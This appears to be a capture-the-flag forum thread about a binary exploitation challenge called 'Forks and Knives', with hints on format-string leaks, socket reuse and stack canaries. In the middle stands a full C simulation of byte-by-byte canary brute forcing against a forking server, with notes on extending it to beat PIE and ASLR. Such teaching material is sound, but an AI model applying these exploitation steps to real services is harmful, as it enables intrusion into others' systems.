Official discussion thread for Forks and Knives. Please do not post any spoilers or big hints.
Very enjoyable challenge, and I learned some new things.
I’m having issues finding a way to leak anything from the program. I see a few possibilities but no way to get there reliably.
Review carefully the process by which your input is output!
More hint: the process by which your input is printed to the file.
Everything works locally but when I switch to the HTB instance nothing works. Am I supposed to get a reverse shell, or read the flag and punt it over the socket? EDIT: by locally I mean the Docker image.
A reverse shell is possible, but there is a different technique you can use that utilizes the existing socket: socket reuse or fd-dup.
Very good challenge. I managed to solve it, but I have a local issue I don’t understand. Remotely, I can connect as many times as I want without any problems. But locally, I can’t. Even though I close all the connections before making another one, I can only make a limited number of connections. After that, it gets stuck. Does anyone know what I might be doing wrong?
I’ve made good progress and have 90% of the exploit put together, but can’t seem to work around one of the mitigations because I can’t seem to leak a particular value. Is it possible to build an arbitrary read primitive or do I need to get creative and use my existing leak?
How do I leak the canary with the format string when I only have 4 bytes?
Got it: a forked process has the same canary as the parent, so we can brute-force the canary.
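As an added example, not code from the thread or from the challenge itself: a self-contained C simulation of the byte-by-byte canary brute force the post above describes. Because a forking server generates its canary once and every child inherits it, a child that aborts only tells you the guess was wrong, so each of the 8 bytes can be searched independently (at most 256 connections per byte instead of 2^64 guesses). The server, the 32-byte buffer, the canary value and the function names are assumptions for illustration only.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE   32   /* assumed size of the vulnerable stack buffer */
#define CANARY_LEN 8    /* 64-bit canary, as on x86-64 glibc */

/* A forking server picks its stack canary once, at startup; every fork()ed
 * child inherits the identical value. Simulated here with a process-wide
 * variable instead of a real fork(). */
static uint8_t server_canary[CANARY_LEN];

void server_init(const uint8_t canary[CANARY_LEN]) {
    memcpy(server_canary, canary, CANARY_LEN);
}

/* One connection handled by one "child". Frame layout: buffer, then the
 * canary directly above it. The real bug copies without bounds; the clamp
 * only keeps this simulation memory-safe. Returns 1 if the child "returns
 * normally" (canary intact) and 0 if it "aborts" (stack smashing detected),
 * which the remote attacker observes as a reply versus a dropped connection. */
int server_handle(const uint8_t *in, size_t len) {
    uint8_t frame[BUF_SIZE + CANARY_LEN];
    memcpy(frame + BUF_SIZE, server_canary, CANARY_LEN);
    if (len > sizeof frame) len = sizeof frame;
    memcpy(frame, in, len);                     /* the overflow */
    return memcmp(frame + BUF_SIZE, server_canary, CANARY_LEN) == 0;
}

/* Attacker side: overflow exactly one byte past the already-known prefix and
 * try all 256 values; the child survives only for the correct byte, and the
 * bytes above the guess are left untouched for the next round.
 * Fills `out` and returns the number of connections used, or -1 on failure. */
long brute_force_canary(uint8_t out[CANARY_LEN]) {
    uint8_t payload[BUF_SIZE + CANARY_LEN];
    memset(payload, 'A', BUF_SIZE);             /* filler up to the canary */
    long attempts = 0;
    for (size_t i = 0; i < CANARY_LEN; i++) {
        int found = 0;
        for (int guess = 0; guess < 256; guess++) {
            payload[BUF_SIZE + i] = (uint8_t)guess;
            attempts++;
            if (server_handle(payload, BUF_SIZE + i + 1)) {
                out[i] = (uint8_t)guess;
                found = 1;
                break;
            }
        }
        if (!found) return -1;                  /* canary changed under us */
    }
    return attempts;
}

int main(void) {
    /* Constructed canary for the demo; glibc's real one has a 0x00 low byte,
     * which is why the first round succeeds on the very first guess. */
    const uint8_t secret[CANARY_LEN] = {0x00, 0x3a, 0x9f, 0x11, 0xc4, 0x7e, 0x05, 0xe2};
    uint8_t leaked[CANARY_LEN];
    server_init(secret);
    long n = brute_force_canary(leaked);
    printf("recovered canary in %ld connections:", n);
    for (int i = 0; i < CANARY_LEN; i++) printf(" %02x", leaked[i]);
    printf("\n");
    return memcmp(leaked, secret, CANARY_LEN) != 0;
}
```

Two caveats carry over to a real target: the prefix you have recovered is only valid while the same parent process is alive (a restart or re-exec picks a new canary and you start over), and the same one-byte-at-a-time trick extends upward to the saved frame pointer and return address, which is how PIE and ASLR are usually beaten on a forking service.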
Brute forcing is really the solution here? That is somewhat disappointing
https://book.jorianwoltjer.com/binary-exploitation/stack-canaries